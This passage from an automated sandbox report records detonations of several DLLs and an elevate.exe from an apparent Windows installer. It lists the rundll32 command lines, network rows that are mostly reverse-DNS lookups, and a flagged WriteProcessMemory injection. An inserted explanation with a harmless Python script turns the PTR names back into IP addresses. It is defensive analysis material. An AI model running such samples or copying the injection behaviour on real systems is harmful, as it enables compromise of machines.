| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-03-02 22:42
Reported
2024-03-02 22:47
Platform
win10-20240221-en
Max time kernel
131s
Max time network
138s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ffmpeg.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-03-02 22:42
Reported
2024-03-02 22:48
Platform
win10-20240221-en
Max time kernel
123s
Max time network
136s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libGLESv2.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 96.134.221.88.in-addr.arpa | udp |
| US | 20.231.121.79:80 | | tcp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-03-02 22:42
Reported
2024-03-02 22:47
Platform
win10-20240221-en
Max time kernel
133s
Max time network
140s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe
"C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe"
Network
| Country | Destination | Domain | Proto |
| US | 20.231.121.79:80 | | tcp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.173.189.20.in-addr.arpa | udp |
Files
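The Network tables in these runs are mostly rows of `*.in-addr.arpa` queries to 8.8.8.8:53. Those are reverse (PTR) lookups, not the sample resolving a name of its own: the four labels in front of `.in-addr.arpa` are the octets of an IP address in reverse order, so `97.238.56.23.in-addr.arpa` asks for the name of 23.56.238.97. The report does not say whether the sample or the guest OS issued them, but reversing the octets recovers the peers that were actually talked to, which is what matters when the rows are compared against the direct TCP connections (the `20.231.121.79:80` rows in behavioral9 and behavioral11). The following is an added example, not part of the sandbox report, that parses rows in this page's table layout (Country, Destination, Domain, Proto), turns each PTR name back into a forward IP and counts the distinct peers across runs; the embedded rows are copied from the behavioral3, behavioral9 and behavioral11 tables above.

```python
import ipaddress
import re
from collections import Counter

# Constructed excerpt: the Network tables of behavioral3, behavioral9 and behavioral11
# copied from the report, columns in header order (Country, Destination, Domain, Proto).
NETWORK_EXCERPT = """
| US | 8.8.8.8:53 | 97.238.56.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.134.221.88.in-addr.arpa | udp |
| US | 20.231.121.79:80 |  | tcp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 20.231.121.79:80 |  | tcp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.173.189.20.in-addr.arpa | udp |
"""

ROW_RE = re.compile(
    r"^\|\s*([A-Z]{2})\s*\|\s*([^|]+?)\s*\|\s*([^|]*?)\s*\|\s*(tcp|udp)\s*\|$"
)


def ptr_to_ip(name):
    """Map a PTR name such as 97.238.56.23.in-addr.arpa back to 23.56.238.97.

    Returns None for anything that is not a well-formed IPv4 reverse name.
    """
    suffix = ".in-addr.arpa"
    if not name.endswith(suffix):
        return None
    octets = name[: -len(suffix)].split(".")
    if len(octets) != 4:
        return None
    try:
        return str(ipaddress.IPv4Address(".".join(reversed(octets))))
    except ipaddress.AddressValueError:    # e.g. an octet above 255
        return None


def summarize(text):
    """Split a Network table into three Counters:

    resolved  - forward IPs recovered from PTR queries, keyed by IP
    direct    - rows with an empty Domain column, i.e. plain connections, keyed 'ip:port/proto'
    forward   - ordinary name lookups (non-PTR Domain values), keyed by name
    """
    resolved, direct, forward = Counter(), Counter(), Counter()
    for raw in text.splitlines():
        m = ROW_RE.match(raw.strip())
        if m is None:                      # header, separator or blank line
            continue
        _country, dest, domain, proto = m.groups()
        ip = ptr_to_ip(domain)
        if ip is not None:
            resolved[ip] += 1
        elif domain == "":
            direct["%s/%s" % (dest, proto)] += 1
        else:
            forward[domain] += 1
    return resolved, direct, forward


if __name__ == "__main__":
    resolved, direct, forward = summarize(NETWORK_EXCERPT)
    print("reverse-resolved peers:", dict(resolved))
    print("direct connections:   ", dict(direct))
    print("forward lookups:      ", dict(forward))
```

Across these three runs the recovered peers are seven distinct addresses, two of them (13.89.179.8 and 93.184.221.240) looked up in more than one run, while the only direct connection recorded is 20.231.121.79:80 over TCP. None of the PTR targets appears as a direct destination in these tables, so the reverse lookups cannot be read as the sample contacting those hosts; they only show which addresses something in the guest asked a name for.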
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-02 22:42
Reported
2024-03-02 22:47
Platform
win10-20240221-en
Max time kernel
127s
Max time network
139s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3004 wrote to memory of 2324 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3004 wrote to memory of 2324 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3004 wrote to memory of 2324 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 636
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 112.118.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-03-02 22:42
Reported
2024-03-02 22:48
Platform
win10-20240221-en
Max time kernel
121s
Max time network
143s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\vulkan-1.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 112.118.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.173.189.20.in-addr.arpa | udp |